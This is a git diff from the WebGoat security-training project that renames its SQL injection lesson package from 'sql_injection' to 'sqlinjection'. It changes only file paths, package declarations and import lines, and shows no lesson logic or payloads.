 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content10.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content11.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content12.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content12a.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content12b.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content13.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content14.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content6.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content6a.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content6c.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content7.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content8.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_content9.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content1.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content10.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content11.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content12.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content2.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content3.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content4.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content5_after.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content5_before.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content6.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content7.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content8.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_content9.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_introduction_plan.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_jdbc_completion.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_jdbc_newcode.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_order_by.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_quiz.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/html/SqlInjection.html (85%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/html/SqlInjectionAdvanced.html (92%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/html/SqlInjectionMitigations.html (84%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/i18n/WebGoatLabels_de.properties (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/i18n/WebGoatLabels_fr.properties (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/i18n/WebGoatLabels_ru.properties (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/js/assignment10b.js (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/js/assignment13.js (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/js/challenge.js (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/js/questions_sql_injection.json (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/SqlLessonTest.java (92%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson10Test.java (96%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson2Test.java (93%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson5Test.java (96%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson5aTest.java (97%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson6aTest.java (97%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson6bTest.java (94%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson8Test.java (97%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson9Test.java (98%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlInjectionLesson13Test.java (97%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlOnlyInputValidationOnKeywordsTest.java (93%)
 rename src/test/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlOnlyInputValidationTest.java (92%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java
index 9a472067e..39119f875 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallenge.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallenge.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java
index 1acc9f538..63efbdda0 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallenge.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.LessonDataSource;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallengeLogin.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallengeLogin.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java
index 766b8222c..baaa1965b 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallengeLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java
index 38a02f2b1..ef4c4c0c1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
-import org.owasp.webgoat.lessons.sql_injection.introduction.SqlInjectionLesson5a;
+import org.owasp.webgoat.lessons.sqlinjection.introduction.SqlInjectionLesson5a;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6b.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6b.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java
index b8e8cc97b..602c921b1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionQuiz.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java
index 55255de97..4e526d605 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java
similarity index 95%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java
index dbd855fec..fc76b5d49 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java
index bc5141068..89a75ab9c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java
index 4a8d5f250..328ac3a4a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java
index e67275535..a1ec2cc40 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java
index 101725c92..28bd50d3e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java
index 827900369..9f031d45c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5a.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java
index c600c6389..0a6429ee8 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java
index c7514ff10..e22b6e4b6 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5b.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java
index 90c1c911d..6870708b3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java
index 16b60b19d..1377ea5eb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/Servers.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/Servers.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java
index 43e290e10..078f18d44 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/Servers.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/Servers.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10a.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
index 9758f061b..9c1c5a902 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10a.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10b.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java
similarity index 99%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10b.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java
index b8aedf8d4..106cf457e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson10b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java
index 9c5c733f8..c94e65b67 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.LessonDataSource;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java
index 1fd732c46..417790c45 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionMitigations.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidation.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java
similarity index 94%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidation.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java
index 02720313b..42136180e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
-import org.owasp.webgoat.lessons.sql_injection.advanced.SqlInjectionLesson6a;
+import org.owasp.webgoat.lessons.sqlinjection.advanced.SqlInjectionLesson6a;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java
similarity index 94%
rename from src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
rename to src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java
index 89285cb2a..5e93dae55 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
-import org.owasp.webgoat.lessons.sql_injection.advanced.SqlInjectionLesson6a;
+import org.owasp.webgoat.lessons.sqlinjection.advanced.SqlInjectionLesson6a;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
